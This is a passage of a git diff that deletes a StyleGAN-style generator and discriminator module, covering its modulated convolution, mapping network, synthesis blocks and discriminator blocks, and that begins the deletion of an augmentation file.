noise=None, # Optional noise tensor to add to the output activations. - up=1, # Integer upsampling factor. - down=1, # Integer downsampling factor. - padding=0, # Padding with respect to the upsampled image. - # Low-pass filter to apply when resampling activations. Must be prepared beforehand by calling upfirdn2d.setup_filter(). - resample_filter=None, - demodulate=True, # Apply weight demodulation? - # False = convolution, True = correlation (matches torch.nn.functional.conv2d). - flip_weight=True, - # Perform modulation, convolution, and demodulation as a single fused operation? - fused_modconv=True, -): - batch_size = x.shape[0] - out_channels, in_channels, kh, kw = weight.shape - misc.assert_shape(weight, [out_channels, in_channels, kh, kw]) # [OIkk] - misc.assert_shape(x, [batch_size, in_channels, None, None]) # [NIHW] - misc.assert_shape(styles, [batch_size, in_channels]) # [NI] - - # Pre-normalize inputs to avoid FP16 overflow. - if x.dtype == torch.float16 and demodulate: - weight = weight * (1 / np.sqrt(in_channels * kh * kw) / - weight.norm(float('inf'), dim=[1, 2, 3], keepdim=True)) # max_Ikk - styles = styles / \ - styles.norm(float('inf'), dim=1, keepdim=True) # max_I - - # Calculate per-sample weights and demodulation coefficients. - w = None - dcoefs = None - if demodulate or fused_modconv: - w = weight.unsqueeze(0) # [NOIkk] - w = w * styles.reshape(batch_size, 1, -1, 1, 1) # [NOIkk] - if demodulate: - dcoefs = (w.square().sum(dim=[2, 3, 4]) + 1e-8).rsqrt() # [NO] - if demodulate and fused_modconv: - w = w * dcoefs.reshape(batch_size, -1, 1, 1, 1) # [NOIkk] - - # Execute by scaling the activations before and after the convolution. - if not fused_modconv: - x = x * styles.to(x.dtype).reshape(batch_size, -1, 1, 1) - x = conv2d_resample.conv2d_resample(x=x, w=weight.to( - x.dtype), f=resample_filter, up=up, down=down, padding=padding, flip_weight=flip_weight) - if demodulate and noise is not None: - x = fma.fma(x, dcoefs.to(x.dtype).reshape( - batch_size, -1, 1, 1), noise.to(x.dtype)) - elif demodulate: - x = x * dcoefs.to(x.dtype).reshape(batch_size, -1, 1, 1) - elif noise is not None: - x = x.add_(noise.to(x.dtype)) - return x - - # Execute as one fused op using grouped convolution. 
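-    # Fold the batch into the channel dimension and give each sample its own filter group:
-    # x becomes [1, N*C_in, H, W] and w becomes [N*C_out, C_in, kh, kw], so a single grouped
-    # conv2d applies per-sample modulated weights without running N separate convolutions.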
- with misc.suppress_tracer_warnings(): # this value will be treated as a constant - batch_size = int(batch_size) - misc.assert_shape(x, [batch_size, in_channels, None, None]) - x = x.reshape(1, -1, *x.shape[2:]) - w = w.reshape(-1, in_channels, kh, kw) - x = conv2d_resample.conv2d_resample(x=x, w=w.to( - x.dtype), f=resample_filter, up=up, down=down, padding=padding, groups=batch_size, flip_weight=flip_weight) - x = x.reshape(batch_size, -1, *x.shape[2:]) - if noise is not None: - x = x.add_(noise) - return x - -# ---------------------------------------------------------------------------- - - -@persistence.persistent_class -class FullyConnectedLayer(torch.nn.Module): - def __init__(self, - in_features, # Number of input features. - out_features, # Number of output features. - bias=True, # Apply additive bias before the activation function? - # Activation function: 'relu', 'lrelu', etc. - activation='linear', - lr_multiplier=1, # Learning rate multiplier. - bias_init=0, # Initial value for the additive bias. - ): - super().__init__() - self.in_features = in_features - self.out_features = out_features - self.activation = activation - self.weight = torch.nn.Parameter(torch.randn( - [out_features, in_features]) / lr_multiplier) - self.bias = torch.nn.Parameter(torch.full( - [out_features], np.float32(bias_init))) if bias else None - self.weight_gain = lr_multiplier / np.sqrt(in_features) - self.bias_gain = lr_multiplier - - def forward(self, x): - w = self.weight.to(x.dtype) * self.weight_gain - b = self.bias - if b is not None: - b = b.to(x.dtype) - if self.bias_gain != 1: - b = b * self.bias_gain - - if self.activation == 'linear' and b is not None: - x = torch.addmm(b.unsqueeze(0), x, w.t()) - else: - x = x.matmul(w.t()) - x = bias_act.bias_act(x, b, act=self.activation) - return x - - def extra_repr(self): - return f'in_features={self.in_features:d}, out_features={self.out_features:d}, activation={self.activation:s}' - -# ---------------------------------------------------------------------------- - - -@persistence.persistent_class -class Conv2dLayer(torch.nn.Module): - def __init__(self, - in_channels, # Number of input channels. - out_channels, # Number of output channels. - # Width and height of the convolution kernel. - kernel_size, - bias=True, # Apply additive bias before the activation function? - # Activation function: 'relu', 'lrelu', etc. - activation='linear', - up=1, # Integer upsampling factor. - down=1, # Integer downsampling factor. - # Low-pass filter to apply when resampling activations. - resample_filter=[1, 3, 3, 1], - # Clamp the output to +-X, None = disable clamping. - conv_clamp=None, - channels_last=False, # Expect the input to have memory_format=channels_last? - trainable=True, # Update the weights of this layer during training? 
- ): - super().__init__() - self.in_channels = in_channels - self.out_channels = out_channels - self.activation = activation - self.up = up - self.down = down - self.conv_clamp = conv_clamp - self.register_buffer( - 'resample_filter', upfirdn2d.setup_filter(resample_filter)) - self.padding = kernel_size // 2 - self.weight_gain = 1 / np.sqrt(in_channels * (kernel_size ** 2)) - self.act_gain = bias_act.activation_funcs[activation].def_gain - - memory_format = torch.channels_last if channels_last else torch.contiguous_format - weight = torch.randn([out_channels, in_channels, kernel_size, kernel_size]).to( - memory_format=memory_format) - bias = torch.zeros([out_channels]) if bias else None - if trainable: - self.weight = torch.nn.Parameter(weight) - self.bias = torch.nn.Parameter(bias) if bias is not None else None - else: - self.register_buffer('weight', weight) - if bias is not None: - self.register_buffer('bias', bias) - else: - self.bias = None - - def forward(self, x, gain=1): - w = self.weight * self.weight_gain - b = self.bias.to(x.dtype) if self.bias is not None else None - flip_weight = (self.up == 1) # slightly faster - x = conv2d_resample.conv2d_resample(x=x, w=w.to( - x.dtype), f=self.resample_filter, up=self.up, down=self.down, padding=self.padding, flip_weight=flip_weight) - - act_gain = self.act_gain * gain - act_clamp = self.conv_clamp * gain if self.conv_clamp is not None else None - x = bias_act.bias_act(x, b, act=self.activation, - gain=act_gain, clamp=act_clamp) - return x - - def extra_repr(self): - return ' '.join([ - f'in_channels={self.in_channels:d}, out_channels={self.out_channels:d}, activation={self.activation:s},', - f'up={self.up}, down={self.down}']) - -# ---------------------------------------------------------------------------- - - -@persistence.persistent_class -class MappingNetwork(torch.nn.Module): - def __init__(self, - # Input latent (Z) dimensionality, 0 = no latent. - z_dim, - # Conditioning label (C) dimensionality, 0 = no label. - c_dim, - # Intermediate latent (W) dimensionality. - w_dim, - # Number of intermediate latents to output, None = do not broadcast. - num_ws, - num_layers=8, # Number of mapping layers. - # Label embedding dimensionality, None = same as w_dim. - embed_features=None, - # Number of intermediate features in the mapping layers, None = same as w_dim. - layer_features=None, - # Activation function: 'relu', 'lrelu', etc. - activation='lrelu', - # Learning rate multiplier for the mapping layers. - lr_multiplier=0.01, - # Decay for tracking the moving average of W during training, None = do not track. 
- w_avg_beta=0.998, - ): - super().__init__() - self.z_dim = z_dim - self.c_dim = c_dim - self.w_dim = w_dim - self.num_ws = num_ws - self.num_layers = num_layers - self.w_avg_beta = w_avg_beta - - if embed_features is None: - embed_features = w_dim - if c_dim == 0: - embed_features = 0 - if layer_features is None: - layer_features = w_dim - features_list = [z_dim + embed_features] + \ - [layer_features] * (num_layers - 1) + [w_dim] - - if c_dim > 0: - self.embed = FullyConnectedLayer(c_dim, embed_features) - for idx in range(num_layers): - in_features = features_list[idx] - out_features = features_list[idx + 1] - layer = FullyConnectedLayer( - in_features, out_features, activation=activation, lr_multiplier=lr_multiplier) - setattr(self, f'fc{idx}', layer) - - if num_ws is not None and w_avg_beta is not None: - self.register_buffer('w_avg', torch.zeros([w_dim])) - - def forward(self, z, c, truncation_psi=1, truncation_cutoff=None, update_emas=False): - # Embed, normalize, and concat inputs. - x = None - with torch.autograd.profiler.record_function('input'): - if self.z_dim > 0: - misc.assert_shape(z, [None, self.z_dim]) - x = normalize_2nd_moment(z.to(torch.float32)) - if self.c_dim > 0: - misc.assert_shape(c, [None, self.c_dim]) - y = normalize_2nd_moment(self.embed(c.to(torch.float32))) - x = torch.cat([x, y], dim=1) if x is not None else y - - # Main layers. - for idx in range(self.num_layers): - layer = getattr(self, f'fc{idx}') - x = layer(x) - - # Update moving average of W. - if update_emas and self.w_avg_beta is not None: - with torch.autograd.profiler.record_function('update_w_avg'): - self.w_avg.copy_(x.detach().mean( - dim=0).lerp(self.w_avg, self.w_avg_beta)) - - # Broadcast. - if self.num_ws is not None: - with torch.autograd.profiler.record_function('broadcast'): - x = x.unsqueeze(1).repeat([1, self.num_ws, 1]) - - # Apply truncation. - if truncation_psi != 1: - with torch.autograd.profiler.record_function('truncate'): - assert self.w_avg_beta is not None - if self.num_ws is None or truncation_cutoff is None: - x = self.w_avg.lerp(x, truncation_psi) - else: - x[:, :truncation_cutoff] = self.w_avg.lerp( - x[:, :truncation_cutoff], truncation_psi) - return x - - def extra_repr(self): - return f'z_dim={self.z_dim:d}, c_dim={self.c_dim:d}, w_dim={self.w_dim:d}, num_ws={self.num_ws:d}' - -# ---------------------------------------------------------------------------- - - -@persistence.persistent_class -class SynthesisLayer(torch.nn.Module): - def __init__(self, - in_channels, # Number of input channels. - out_channels, # Number of output channels. - # Intermediate latent (W) dimensionality. - w_dim, - resolution, # Resolution of this layer. - kernel_size=3, # Convolution kernel size. - up=1, # Integer upsampling factor. - use_noise=True, # Enable noise input? - # Activation function: 'relu', 'lrelu', etc. - activation='lrelu', - # Low-pass filter to apply when resampling activations. - resample_filter=[1, 3, 3, 1], - # Clamp the output of convolution layers to +-X, None = disable clamping. - conv_clamp=None, - channels_last=False, # Use channels_last format for the weights? 
- ): - super().__init__() - self.in_channels = in_channels - self.out_channels = out_channels - self.w_dim = w_dim - self.resolution = resolution - self.up = up - self.use_noise = use_noise - self.activation = activation - self.conv_clamp = conv_clamp - self.register_buffer( - 'resample_filter', upfirdn2d.setup_filter(resample_filter)) - self.padding = kernel_size // 2 - self.act_gain = bias_act.activation_funcs[activation].def_gain - - self.affine = FullyConnectedLayer(w_dim, in_channels, bias_init=1) - memory_format = torch.channels_last if channels_last else torch.contiguous_format - self.weight = torch.nn.Parameter(torch.randn( - [out_channels, in_channels, kernel_size, kernel_size]).to(memory_format=memory_format)) - if use_noise: - self.register_buffer( - 'noise_const', torch.randn([resolution, resolution])) - self.noise_strength = torch.nn.Parameter(torch.zeros([])) - self.bias = torch.nn.Parameter(torch.zeros([out_channels])) - - def forward(self, x, w, noise_mode='random', fused_modconv=True, gain=1): - assert noise_mode in ['random', 'const', 'none'] - in_resolution = self.resolution // self.up - misc.assert_shape(x, [None, self.in_channels, - in_resolution, in_resolution]) - styles = self.affine(w) - - noise = None - if self.use_noise and noise_mode == 'random': - noise = torch.randn([x.shape[0], 1, self.resolution, - self.resolution], device=x.device) * self.noise_strength - if self.use_noise and noise_mode == 'const': - noise = self.noise_const * self.noise_strength - - flip_weight = (self.up == 1) # slightly faster - x = modulated_conv2d(x=x, weight=self.weight, styles=styles, noise=noise, up=self.up, - padding=self.padding, resample_filter=self.resample_filter, flip_weight=flip_weight, fused_modconv=fused_modconv) - - act_gain = self.act_gain * gain - act_clamp = self.conv_clamp * gain if self.conv_clamp is not None else None - x = bias_act.bias_act(x, self.bias.to( - x.dtype), act=self.activation, gain=act_gain, clamp=act_clamp) - return x - - def extra_repr(self): - return ' '.join([ - f'in_channels={self.in_channels:d}, out_channels={self.out_channels:d}, w_dim={self.w_dim:d},', - f'resolution={self.resolution:d}, up={self.up}, activation={self.activation:s}']) - -# ---------------------------------------------------------------------------- - - -@persistence.persistent_class -class ToRGBLayer(torch.nn.Module): - def __init__(self, in_channels, out_channels, w_dim, kernel_size=1, conv_clamp=None, channels_last=False): - super().__init__() - self.in_channels = in_channels - self.out_channels = out_channels - self.w_dim = w_dim - self.conv_clamp = conv_clamp - self.affine = FullyConnectedLayer(w_dim, in_channels, bias_init=1) - memory_format = torch.channels_last if channels_last else torch.contiguous_format - self.weight = torch.nn.Parameter(torch.randn( - [out_channels, in_channels, kernel_size, kernel_size]).to(memory_format=memory_format)) - self.bias = torch.nn.Parameter(torch.zeros([out_channels])) - self.weight_gain = 1 / np.sqrt(in_channels * (kernel_size ** 2)) - - def forward(self, x, w, fused_modconv=True): - styles = self.affine(w) * self.weight_gain - x = modulated_conv2d(x=x, weight=self.weight, styles=styles, - demodulate=False, fused_modconv=fused_modconv) - x = bias_act.bias_act(x, self.bias.to(x.dtype), clamp=self.conv_clamp) - return x - - def extra_repr(self): - return f'in_channels={self.in_channels:d}, out_channels={self.out_channels:d}, w_dim={self.w_dim:d}' - -# ---------------------------------------------------------------------------- - - 
-@persistence.persistent_class -class SynthesisBlock(torch.nn.Module): - def __init__(self, - # Number of input channels, 0 = first block. - in_channels, - # Number of output channels. - out_channels, - # Intermediate latent (W) dimensionality. - w_dim, - # Resolution of this block. - resolution, - # Number of output color channels. - img_channels, - is_last, # Is this the last block? - # Architecture: 'orig', 'skip', 'resnet'. - architecture='skip', - # Low-pass filter to apply when resampling activations. - resample_filter=[1, 3, 3, 1], - # Clamp the output of convolution layers to +-X, None = disable clamping. - conv_clamp=256, - use_fp16=False, # Use FP16 for this block? - fp16_channels_last=False, # Use channels-last memory format with FP16? - # Default value of fused_modconv. 'inference_only' = True for inference, False for training. - fused_modconv_default=True, - # Arguments for SynthesisLayer. - **layer_kwargs, - ): - assert architecture in ['orig', 'skip', 'resnet'] - super().__init__() - self.in_channels = in_channels - self.w_dim = w_dim - self.resolution = resolution - self.img_channels = img_channels - self.is_last = is_last - self.architecture = architecture - self.use_fp16 = use_fp16 - self.channels_last = (use_fp16 and fp16_channels_last) - self.fused_modconv_default = fused_modconv_default - self.register_buffer( - 'resample_filter', upfirdn2d.setup_filter(resample_filter)) - self.num_conv = 0 - self.num_torgb = 0 - - if in_channels == 0: - self.const = torch.nn.Parameter(torch.randn( - [out_channels, resolution, resolution])) - - if in_channels != 0: - self.conv0 = SynthesisLayer(in_channels, out_channels, w_dim=w_dim, resolution=resolution, up=2, - resample_filter=resample_filter, conv_clamp=conv_clamp, channels_last=self.channels_last, **layer_kwargs) - self.num_conv += 1 - - self.conv1 = SynthesisLayer(out_channels, out_channels, w_dim=w_dim, resolution=resolution, - conv_clamp=conv_clamp, channels_last=self.channels_last, **layer_kwargs) - self.num_conv += 1 - - if is_last or architecture == 'skip': - self.torgb = ToRGBLayer(out_channels, img_channels, w_dim=w_dim, - conv_clamp=conv_clamp, channels_last=self.channels_last) - self.num_torgb += 1 - - if in_channels != 0 and architecture == 'resnet': - self.skip = Conv2dLayer(in_channels, out_channels, kernel_size=1, bias=False, up=2, - resample_filter=resample_filter, channels_last=self.channels_last) - - def forward(self, x, img, ws, force_fp32=False, fused_modconv=None, update_emas=False, **layer_kwargs): - _ = update_emas # unused - misc.assert_shape( - ws, [None, self.num_conv + self.num_torgb, self.w_dim]) - w_iter = iter(ws.unbind(dim=1)) - if ws.device.type != 'cuda': - force_fp32 = True - dtype = torch.float16 if self.use_fp16 and not force_fp32 else torch.float32 - memory_format = torch.channels_last if self.channels_last and not force_fp32 else torch.contiguous_format - if fused_modconv is None: - fused_modconv = self.fused_modconv_default - if fused_modconv == 'inference_only': - fused_modconv = (not self.training) - - # Input. - if self.in_channels == 0: - x = self.const.to(dtype=dtype, memory_format=memory_format) - x = x.unsqueeze(0).repeat([ws.shape[0], 1, 1, 1]) - else: - misc.assert_shape(x, [None, self.in_channels, - self.resolution // 2, self.resolution // 2]) - x = x.to(dtype=dtype, memory_format=memory_format) - - # Main layers. 
- if self.in_channels == 0: - x = self.conv1(x, next(w_iter), - fused_modconv=fused_modconv, **layer_kwargs) - elif self.architecture == 'resnet': - y = self.skip(x, gain=np.sqrt(0.5)) - x = self.conv0(x, next(w_iter), - fused_modconv=fused_modconv, **layer_kwargs) - x = self.conv1(x, next(w_iter), fused_modconv=fused_modconv, - gain=np.sqrt(0.5), **layer_kwargs) - x = y.add_(x) - else: - x = self.conv0(x, next(w_iter), - fused_modconv=fused_modconv, **layer_kwargs) - x = self.conv1(x, next(w_iter), - fused_modconv=fused_modconv, **layer_kwargs) - - # ToRGB. - if img is not None: - misc.assert_shape( - img, [None, self.img_channels, self.resolution // 2, self.resolution // 2]) - img = upfirdn2d.upsample2d(img, self.resample_filter) - if self.is_last or self.architecture == 'skip': - y = self.torgb(x, next(w_iter), fused_modconv=fused_modconv) - y = y.to(dtype=torch.float32, - memory_format=torch.contiguous_format) - img = img.add_(y) if img is not None else y - - assert x.dtype == dtype - assert img is None or img.dtype == torch.float32 - return x, img - - def extra_repr(self): - return f'resolution={self.resolution:d}, architecture={self.architecture:s}' - -# ---------------------------------------------------------------------------- - - -@persistence.persistent_class -class SynthesisNetwork(torch.nn.Module): - def __init__(self, - # Intermediate latent (W) dimensionality. - w_dim, - img_resolution, # Output image resolution. - img_channels, # Number of color channels. - # Overall multiplier for the number of channels. - channel_base=32768, - # Maximum number of channels in any layer. - channel_max=512, - # Use FP16 for the N highest resolutions. - num_fp16_res=4, - **block_kwargs, # Arguments for SynthesisBlock. - ): - assert img_resolution >= 4 and img_resolution & ( - img_resolution - 1) == 0 - super().__init__() - self.w_dim = w_dim - self.img_resolution = img_resolution - self.img_resolution_log2 = int(np.log2(img_resolution)) - self.img_channels = img_channels - self.num_fp16_res = num_fp16_res - self.block_resolutions = [ - 2 ** i for i in range(2, self.img_resolution_log2 + 1)] - channels_dict = {res: min(channel_base // res, channel_max) - for res in self.block_resolutions} - fp16_resolution = max( - 2 ** (self.img_resolution_log2 + 1 - num_fp16_res), 8) - - self.num_ws = 0 - for res in self.block_resolutions: - in_channels = channels_dict[res // 2] if res > 4 else 0 - out_channels = channels_dict[res] - use_fp16 = (res >= fp16_resolution) - is_last = (res == self.img_resolution) - block = SynthesisBlock(in_channels, out_channels, w_dim=w_dim, resolution=res, - img_channels=img_channels, is_last=is_last, use_fp16=use_fp16, **block_kwargs) - self.num_ws += block.num_conv - if is_last: - self.num_ws += block.num_torgb - setattr(self, f'b{res}', block) - - def forward(self, ws, return_feature=False, **block_kwargs): - block_ws = [] - features = [] - with torch.autograd.profiler.record_function('split_ws'): - misc.assert_shape(ws, [None, self.num_ws, self.w_dim]) - ws = ws.to(torch.float32) - w_idx = 0 - for res in self.block_resolutions: - block = getattr(self, f'b{res}') - block_ws.append( - ws.narrow(1, w_idx, block.num_conv + block.num_torgb)) - w_idx += block.num_conv - - x = img = None - for res, cur_ws in zip(self.block_resolutions, block_ws): - block = getattr(self, f'b{res}') - x, img = block(x, img, cur_ws, **block_kwargs) - features.append(x) - if return_feature: - return img, features - else: - return img - - def extra_repr(self): - return ' '.join([ - 
f'w_dim={self.w_dim:d}, num_ws={self.num_ws:d},', - f'img_resolution={self.img_resolution:d}, img_channels={self.img_channels:d},', - f'num_fp16_res={self.num_fp16_res:d}']) - -# ---------------------------------------------------------------------------- - - -@persistence.persistent_class -class Generator(torch.nn.Module): - def __init__(self, - z_dim, # Input latent (Z) dimensionality. - # Conditioning label (C) dimensionality. - c_dim, - # Intermediate latent (W) dimensionality. - w_dim, - img_resolution, # Output resolution. - img_channels, # Number of output color channels. - mapping_kwargs={}, # Arguments for MappingNetwork. - synthesis_kwargs={}, # Arguments for SynthesisNetwork. - resize=None, - # **synthesis_kwargs, # Arguments for SynthesisNetwork. - ): - super().__init__() - self.z_dim = z_dim - self.c_dim = c_dim - self.w_dim = w_dim - self.img_resolution = img_resolution - self.img_channels = img_channels - self.synthesis = SynthesisNetwork( - w_dim=w_dim, img_resolution=img_resolution, img_channels=img_channels, **synthesis_kwargs) - self.num_ws = self.synthesis.num_ws - self.mapping = MappingNetwork( - z_dim=z_dim, c_dim=c_dim, w_dim=w_dim, num_ws=self.num_ws, **mapping_kwargs) - self.resize = resize - - def forward(self, z, c, truncation_psi=1, truncation_cutoff=None, update_emas=False, input_is_w=False, return_feature=False, **synthesis_kwargs): - if input_is_w: - ws = z - if ws.dim() == 2: - ws = ws.unsqueeze(1).repeat([1, self.mapping.num_ws, 1]) - else: - ws = self.mapping(z, c, truncation_psi=truncation_psi, - truncation_cutoff=truncation_cutoff, update_emas=update_emas) - img = self.synthesis(ws, update_emas=update_emas, - return_feature=return_feature, **synthesis_kwargs) - if self.resize is not None: - img = imresize(img, [self.resize, self.resize]) - return img - - -def imresize(image, size): - dim = image.dim() - if dim == 3: - image = image.unsqueeze(1) - b, _, h, w = image.shape - if size[0] > h: - image = F.interpolate(image, size, mode='bilinear') - elif size[0] < h: - image = F.interpolate(image, size, mode='area') - if dim == 3: - image = image.squeeze(1) - return image - -# ---------------------------------------------------------------------------- - - -@persistence.persistent_class -class DiscriminatorBlock(torch.nn.Module): - def __init__(self, - # Number of input channels, 0 = first block. - in_channels, - # Number of intermediate channels. - tmp_channels, - # Number of output channels. - out_channels, - # Resolution of this block. - resolution, - # Number of input color channels. - img_channels, - # Index of the first layer. - first_layer_idx, - # Architecture: 'orig', 'skip', 'resnet'. - architecture='resnet', - # Activation function: 'relu', 'lrelu', etc. - activation='lrelu', - # Low-pass filter to apply when resampling activations. - resample_filter=[1, 3, 3, 1], - # Clamp the output of convolution layers to +-X, None = disable clamping. - conv_clamp=None, - use_fp16=False, # Use FP16 for this block? - fp16_channels_last=False, # Use channels-last memory format with FP16? - # Freeze-D: Number of layers to freeze. 
- freeze_layers=0, - ): - assert in_channels in [0, tmp_channels] - assert architecture in ['orig', 'skip', 'resnet'] - super().__init__() - self.in_channels = in_channels - self.resolution = resolution - self.img_channels = img_channels - self.first_layer_idx = first_layer_idx - self.architecture = architecture - self.use_fp16 = use_fp16 - self.channels_last = (use_fp16 and fp16_channels_last) - self.register_buffer( - 'resample_filter', upfirdn2d.setup_filter(resample_filter)) - - self.num_layers = 0 - - def trainable_gen(): - while True: - layer_idx = self.first_layer_idx + self.num_layers - trainable = (layer_idx >= freeze_layers) - self.num_layers += 1 - yield trainable - trainable_iter = trainable_gen() - - if in_channels == 0 or architecture == 'skip': - self.fromrgb = Conv2dLayer(img_channels, tmp_channels, kernel_size=1, activation=activation, - trainable=next(trainable_iter), conv_clamp=conv_clamp, channels_last=self.channels_last) - - self.conv0 = Conv2dLayer(tmp_channels, tmp_channels, kernel_size=3, activation=activation, - trainable=next(trainable_iter), conv_clamp=conv_clamp, channels_last=self.channels_last) - - self.conv1 = Conv2dLayer(tmp_channels, out_channels, kernel_size=3, activation=activation, down=2, - trainable=next(trainable_iter), resample_filter=resample_filter, conv_clamp=conv_clamp, channels_last=self.channels_last) - - if architecture == 'resnet': - self.skip = Conv2dLayer(tmp_channels, out_channels, kernel_size=1, bias=False, down=2, - trainable=next(trainable_iter), resample_filter=resample_filter, channels_last=self.channels_last) - - def forward(self, x, img, force_fp32=False): - if (x if x is not None else img).device.type != 'cuda': - force_fp32 = True - dtype = torch.float16 if self.use_fp16 and not force_fp32 else torch.float32 - memory_format = torch.channels_last if self.channels_last and not force_fp32 else torch.contiguous_format - - # Input. - if x is not None: - misc.assert_shape(x, [None, self.in_channels, - self.resolution, self.resolution]) - x = x.to(dtype=dtype, memory_format=memory_format) - - # FromRGB. - if self.in_channels == 0 or self.architecture == 'skip': - misc.assert_shape( - img, [None, self.img_channels, self.resolution, self.resolution]) - img = img.to(dtype=dtype, memory_format=memory_format) - y = self.fromrgb(img) - x = x + y if x is not None else y - img = upfirdn2d.downsample2d( - img, self.resample_filter) if self.architecture == 'skip' else None - - # Main layers. - if self.architecture == 'resnet': - y = self.skip(x, gain=np.sqrt(0.5)) - x = self.conv0(x) - x = self.conv1(x, gain=np.sqrt(0.5)) - x = y.add_(x) - else: - x = self.conv0(x) - x = self.conv1(x) - - assert x.dtype == dtype - return x, img - - def extra_repr(self): - return f'resolution={self.resolution:d}, architecture={self.architecture:s}' - -# ---------------------------------------------------------------------------- - - -@persistence.persistent_class -class MinibatchStdLayer(torch.nn.Module): - def __init__(self, group_size, num_channels=1): - super().__init__() - self.group_size = group_size - self.num_channels = num_channels - - def forward(self, x): - N, C, H, W = x.shape - with misc.suppress_tracer_warnings(): # as_tensor results are registered as constants - G = torch.min(torch.as_tensor(self.group_size), torch.as_tensor( - N)) if self.group_size is not None else N - F = self.num_channels - c = C // F - - # [GnFcHW] Split minibatch N into n groups of size G, and channels C into F groups of size c. 
- y = x.reshape(G, -1, F, c, H, W) - # [GnFcHW] Subtract mean over group. - y = y - y.mean(dim=0) - # [nFcHW] Calc variance over group. - y = y.square().mean(dim=0) - y = (y + 1e-8).sqrt() # [nFcHW] Calc stddev over group. - # [nF] Take average over channels and pixels. - y = y.mean(dim=[2, 3, 4]) - y = y.reshape(-1, F, 1, 1) # [nF11] Add missing dimensions. - # [NFHW] Replicate over group and pixels. - y = y.repeat(G, 1, H, W) - # [NCHW] Append to input as new channels. - x = torch.cat([x, y], dim=1) - return x - - def extra_repr(self): - return f'group_size={self.group_size}, num_channels={self.num_channels:d}' - -# ---------------------------------------------------------------------------- - - -@persistence.persistent_class -class DiscriminatorEpilogue(torch.nn.Module): - def __init__(self, - in_channels, # Number of input channels. - # Dimensionality of mapped conditioning label, 0 = no label. - cmap_dim, - resolution, # Resolution of this block. - # Number of input color channels. - img_channels, - # Architecture: 'orig', 'skip', 'resnet'. - architecture='resnet', - # Group size for the minibatch standard deviation layer, None = entire minibatch. - mbstd_group_size=4, - # Number of features for the minibatch standard deviation layer, 0 = disable. - mbstd_num_channels=1, - # Activation function: 'relu', 'lrelu', etc. - activation='lrelu', - # Clamp the output of convolution layers to +-X, None = disable clamping. - conv_clamp=None, - ): - assert architecture in ['orig', 'skip', 'resnet'] - super().__init__() - self.in_channels = in_channels - self.cmap_dim = cmap_dim - self.resolution = resolution - self.img_channels = img_channels - self.architecture = architecture - - if architecture == 'skip': - self.fromrgb = Conv2dLayer( - img_channels, in_channels, kernel_size=1, activation=activation) - self.mbstd = MinibatchStdLayer( - group_size=mbstd_group_size, num_channels=mbstd_num_channels) if mbstd_num_channels > 0 else None - self.conv = Conv2dLayer(in_channels + mbstd_num_channels, in_channels, - kernel_size=3, activation=activation, conv_clamp=conv_clamp) - self.fc = FullyConnectedLayer( - in_channels * (resolution ** 2), in_channels, activation=activation) - self.out = FullyConnectedLayer( - in_channels, 1 if cmap_dim == 0 else cmap_dim) - - def forward(self, x, img, cmap, force_fp32=False): - misc.assert_shape(x, [None, self.in_channels, - self.resolution, self.resolution]) # [NCHW] - _ = force_fp32 # unused - dtype = torch.float32 - memory_format = torch.contiguous_format - - # FromRGB. - x = x.to(dtype=dtype, memory_format=memory_format) - if self.architecture == 'skip': - misc.assert_shape( - img, [None, self.img_channels, self.resolution, self.resolution]) - img = img.to(dtype=dtype, memory_format=memory_format) - x = x + self.fromrgb(img) - - # Main layers. - if self.mbstd is not None: - x = self.mbstd(x) - x = self.conv(x) - x = self.fc(x.flatten(1)) - x = self.out(x) - - # Conditioning. - if self.cmap_dim > 0: - misc.assert_shape(cmap, [None, self.cmap_dim]) - x = (x * cmap).sum(dim=1, keepdim=True) * \ - (1 / np.sqrt(self.cmap_dim)) - - assert x.dtype == dtype - return x - - def extra_repr(self): - return f'resolution={self.resolution:d}, architecture={self.architecture:s}' - -# ---------------------------------------------------------------------------- - - -@persistence.persistent_class -class Discriminator(torch.nn.Module): - def __init__(self, - # Conditioning label (C) dimensionality. - c_dim, - img_resolution, # Input resolution. - # Number of input color channels. 
- img_channels, - # Architecture: 'orig', 'skip', 'resnet'. - architecture='resnet', - # Overall multiplier for the number of channels. - channel_base=32768, - # Maximum number of channels in any layer. - channel_max=512, - # Use FP16 for the N highest resolutions. - num_fp16_res=4, - # Clamp the output of convolution layers to +-X, None = disable clamping. - conv_clamp=256, - # Dimensionality of mapped conditioning label, None = default. - cmap_dim=None, - block_kwargs={}, # Arguments for DiscriminatorBlock. - mapping_kwargs={}, # Arguments for MappingNetwork. - # Arguments for DiscriminatorEpilogue. - epilogue_kwargs={}, - ): - super().__init__() - self.c_dim = c_dim - self.img_resolution = img_resolution - self.img_resolution_log2 = int(np.log2(img_resolution)) - self.img_channels = img_channels - self.block_resolutions = [ - 2 ** i for i in range(self.img_resolution_log2, 2, -1)] - channels_dict = {res: min(channel_base // res, channel_max) - for res in self.block_resolutions + [4]} - fp16_resolution = max( - 2 ** (self.img_resolution_log2 + 1 - num_fp16_res), 8) - - if cmap_dim is None: - cmap_dim = channels_dict[4] - if c_dim == 0: - cmap_dim = 0 - - common_kwargs = dict(img_channels=img_channels, - architecture=architecture, conv_clamp=conv_clamp) - cur_layer_idx = 0 - for res in self.block_resolutions: - in_channels = channels_dict[res] if res < img_resolution else 0 - tmp_channels = channels_dict[res] - out_channels = channels_dict[res // 2] - use_fp16 = (res >= fp16_resolution) - block = DiscriminatorBlock(in_channels, tmp_channels, out_channels, resolution=res, - first_layer_idx=cur_layer_idx, use_fp16=use_fp16, **block_kwargs, **common_kwargs) - setattr(self, f'b{res}', block) - cur_layer_idx += block.num_layers - if c_dim > 0: - self.mapping = MappingNetwork( - z_dim=0, c_dim=c_dim, w_dim=cmap_dim, num_ws=None, w_avg_beta=None, **mapping_kwargs) - self.b4 = DiscriminatorEpilogue( - channels_dict[4], cmap_dim=cmap_dim, resolution=4, **epilogue_kwargs, **common_kwargs) - - def forward(self, img, c, update_emas=False, **block_kwargs): - _ = update_emas # unused - x = None - for res in self.block_resolutions: - block = getattr(self, f'b{res}') - x, img = block(x, img, **block_kwargs) - - cmap = None - if self.c_dim > 0: - cmap = self.mapping(None, c) - x = self.b4(x, img, cmap) - return x - - def extra_repr(self): - return f'c_dim={self.c_dim:d}, img_resolution={self.img_resolution:d}, img_channels={self.img_channels:d}' - -# ---------------------------------------------------------------------------- diff --git a/spaces/Amrrs/DragGan-Inversion/training/augment.py b/spaces/Amrrs/DragGan-Inversion/training/augment.py deleted file mode 100644 index 8067f4e3fec058c9025edaa7a9a0442afe859ae5..0000000000000000000000000000000000000000 --- a/spaces/Amrrs/DragGan-Inversion/training/augment.py +++ /dev/null @@ -1,562 +0,0 @@ -# Copyright (c) 